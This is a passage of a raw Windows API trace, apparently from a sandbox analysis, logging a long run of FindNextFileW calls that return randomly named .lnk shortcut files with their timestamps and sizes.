cFileName="NQCf5ew.lnk", cAlternateFileName="")) returned 1 [0094.467] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0a4b460, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd127a000, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd127a000, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1266, dwReserved0=0x0, dwReserved1=0x0, cFileName="NqR9nQMJn0 I.lnk", cAlternateFileName="NQR9NQ~1.LNK")) returned 1 [0094.467] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf4468e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf4468e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcf4468e0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="N_rlN0Z3nRhZqdxj JZI.lnk", cAlternateFileName="N_RLN0~1.LNK")) returned 1 [0094.467] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd11e1a80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd11e1a80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd11e1a80, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9f5, dwReserved0=0x0, dwReserved1=0x0, cFileName="O4VMeO_PmK30fk6.lnk", cAlternateFileName="O4VMEO~1.LNK")) returned 1 [0094.467] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf7665c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf7665c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcf7665c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x24a, dwReserved0=0x0, dwReserved1=0x0, cFileName="oa aQQjrX6y_jTlap6.lnk", cAlternateFileName="OAAQQJ~1.LNK")) returned 1 [0094.467] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1149500, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1149500, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1149500, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x316, dwReserved0=0x0, dwReserved1=0x0, cFileName="OnrpsaEkvylzPJqZCM2l.mkv.lnk", cAlternateFileName="ONRPSA~1.LNK")) returned 1 [0094.467] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd06df4c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd06df4c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd06df4c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1241, dwReserved0=0x0, dwReserved1=0x0, cFileName="oOpoFnm9s.lnk", cAlternateFileName="OOPOFN~1.LNK")) returned 1 [0094.468] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0cd2bc0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0cd2bc0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0cd2bc0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ozdQhhdYCAhwn.lnk", cAlternateFileName="OZDQHH~1.LNK")) returned 1 [0094.468] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfc291c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfc291c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfc291c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x99d, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPCDrQ5.lnk", cAlternateFileName="")) returned 1 [0094.468] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf3ae360, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf3ae360, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcf3ae360, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="PpTfQfUJeEHeOaQm.lnk", cAlternateFileName="PPTFQF~1.LNK")) returned 1 [0094.468] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfcc1740, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfcc1740, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfcc1740, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x218, dwReserved0=0x0, dwReserved1=0x0, cFileName="PYDVqXrN.mkv.lnk", cAlternateFileName="PYDVQX~1.LNK")) returned 1 [0094.468] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1599ce0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1599ce0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1599ce0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xa2d, dwReserved0=0x0, dwReserved1=0x0, cFileName="qQ69AqvCd-_gGmFEhfCj.pdf.lnk", cAlternateFileName="QQ69AQ~1.LNK")) returned 1 [0094.468] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13aab00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13aab00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd13aab00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x0, dwReserved1=0x0, cFileName="Qs1EsaM6mnJQuW3k.lnk", cAlternateFileName="QS1ESA~1.LNK")) returned 1 [0094.468] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0a97720, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0a97720, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0a97720, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xa10, dwReserved0=0x0, dwReserved1=0x0, cFileName="q_m8XgrWlwVpa_ok Jpb.lnk", cAlternateFileName="Q_M8XG~1.LNK")) returned 1 [0094.468] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1599ce0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1599ce0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1599ce0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1937, dwReserved0=0x0, dwReserved1=0x0, cFileName="r5bauI Uaurz 0kBPe.lnk", cAlternateFileName="R5BAUI~1.LNK")) returned 1 [0094.468] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce6bcbc0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1762d60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1762d60, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x942, dwReserved0=0x0, dwReserved1=0x0, cFileName="RBnxFLdoe6j5FMDq.lnk", cAlternateFileName="RBNXFL~1.LNK")) returned 1 [0094.468] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfd0da00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfd0da00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfd0da00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="RkF0hT0Xfp-m3q.lnk", cAlternateFileName="RKF0HT~1.LNK")) returned 1 [0094.468] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd12a0160, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd12a0160, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd12a0160, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="rKqcydSq.mkv.lnk", cAlternateFileName="RKQCYD~1.LNK")) returned 1 [0094.468] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0007580, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0007580, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0007580, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x240, dwReserved0=0x0, dwReserved1=0x0, cFileName="rmPQA vuvasucn14.mkv.lnk", cAlternateFileName="RMPQAV~1.LNK")) returned 1 [0094.468] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce8d1f00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16a4680, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd16a4680, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x2e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming.lnk", cAlternateFileName="")) returned 1 [0094.468] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfd33b60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfd33b60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfd33b60, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x245, dwReserved0=0x0, dwReserved1=0x0, cFileName="s4xZHJNmFEW_-to_l.lnk", cAlternateFileName="S4XZHJ~1.LNK")) returned 1 [0094.468] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13849a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13849a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd13849a0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3de, dwReserved0=0x0, dwReserved1=0x0, cFileName="s8ZDF Lucr_Z28Spu.swf.lnk", cAlternateFileName="S8ZDFL~1.LNK")) returned 1 [0094.469] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcee531e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14b54a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd14b54a0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x8f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="sD_Mf.lnk", cAlternateFileName="")) returned 1 [0094.469] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0d1ee80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0d1ee80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0d1ee80, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x2f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SjIEHWNzBPbEPK.lnk", cAlternateFileName="SJIEHW~1.LNK")) returned 1 [0094.469] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcffe1420, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcffe1420, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcffe1420, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="t2oMmxPi.flv.lnk", cAlternateFileName="T2OMMX~1.LNK")) returned 1 [0094.469] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd08f4800, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd08f4800, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd08f4800, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1367, dwReserved0=0x0, dwReserved1=0x0, cFileName="t2V3IQcrptDn.lnk", cAlternateFileName="T2V3IQ~1.LNK")) returned 1 [0094.469] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd14691e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14691e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd14691e0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x13b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="T6C4G_g_0sfV1dVJsM.lnk", cAlternateFileName="T6C4G_~1.LNK")) returned 1 [0094.469] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfce78a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfce78a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfce78a0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x39e, dwReserved0=0x0, dwReserved1=0x0, cFileName="te-nH.flv.lnk", cAlternateFileName="TE-NHF~1.LNK")) returned 1 [0094.469] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd03e5940, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd03e5940, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd03e5940, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xdca, dwReserved0=0x0, dwReserved1=0x0, cFileName="TKqjZN.flv.lnk", cAlternateFileName="TKQJZN~1.LNK")) returned 1 [0094.469] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcffbb2c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcffbb2c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcffbb2c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xe31, dwReserved0=0x0, dwReserved1=0x0, cFileName="TVHtwFsg.flv.lnk", cAlternateFileName="TVHTWF~1.LNK")) returned 1 [0094.469] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf4468e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf4468e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcf4468e0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="U6t2jBTAet1hJh.lnk", cAlternateFileName="U6T2JB~1.LNK")) returned 1 [0094.469] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0a715c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0a715c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0a715c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="UgJB0bK8M6Fbzeqf.lnk", cAlternateFileName="UGJB0B~1.LNK")) returned 1 [0094.469] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcec3dea0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15bfe40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd15bfe40, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="UKlsVP0OeoLUyu0aA.lnk", cAlternateFileName="UKLSVP~1.LNK")) returned 1 [0094.469] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0cf8d20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0cf8d20, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0cf8d20, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x18df, dwReserved0=0x0, dwReserved1=0x0, cFileName="uPx6uzdIPR.lnk", cAlternateFileName="UPX6UZ~1.LNK")) returned 1 [0094.469] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd12c62c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd12c62c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd12c62c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x12d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V8U50BNOH.lnk", cAlternateFileName="V8U50B~1.LNK")) returned 1 [0094.470] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcef5db80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcef5db80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcef5db80, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="vCNVmrhf2U7XXJBaxRmB.lnk", cAlternateFileName="VCNVMR~1.LNK")) returned 1 [0094.470] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf9edd20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb6aae0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfb6aae0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1765, dwReserved0=0x0, dwReserved1=0x0, cFileName="vmOQizT54.lnk", cAlternateFileName="VMOQIZ~1.LNK")) returned 1 [0094.470] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13d0c60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13d0c60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd13d0c60, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xf4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vo9MO3eEU2 SLpQJWfM.lnk", cAlternateFileName="VO9MO3~1.LNK")) returned 1 [0094.470] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfb6aae0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb6aae0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfb6aae0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1e16, dwReserved0=0x0, dwReserved1=0x0, cFileName="vwNeKxlo1w35_GTiy.lnk", cAlternateFileName="VWNEKX~1.LNK")) returned 1 [0094.470] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15278c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15278c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd15278c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x227, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vxbet57tOqM.lnk", cAlternateFileName="VXBET5~1.LNK")) returned 1 [0094.470] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf870f60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0d6b140, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0d6b140, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x98d, dwReserved0=0x0, dwReserved1=0x0, cFileName="w0y6K3cxjraf-y2uE6.lnk", cAlternateFileName="W0Y6K3~1.LNK")) returned 1 [0094.470] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd002d6e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd002d6e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0053840, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="w1qxUxlTv5acD7ekU7.mkv.lnk", cAlternateFileName="W1QXUX~1.LNK")) returned 1 [0094.470] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfc75480, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfc75480, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfc75480, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9c9, dwReserved0=0x0, dwReserved1=0x0, cFileName="wO--2PwPxtF.lnk", cAlternateFileName="WO--2P~1.LNK")) returned 1 [0094.470] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd10b0f80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd10b0f80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd10b0f80, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x24a, dwReserved0=0x0, dwReserved1=0x0, cFileName="WQTdEEFonuZ7KxbDBX.lnk", cAlternateFileName="WQTDEE~1.LNK")) returned 1 [0094.470] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0a4b460, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0a4b460, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0a4b460, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x189f, dwReserved0=0x0, dwReserved1=0x0, cFileName="WsNjcAtuTT8n1nv.lnk", cAlternateFileName="WSNJCA~1.LNK")) returned 1 [0094.470] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd00799a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd00799a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, 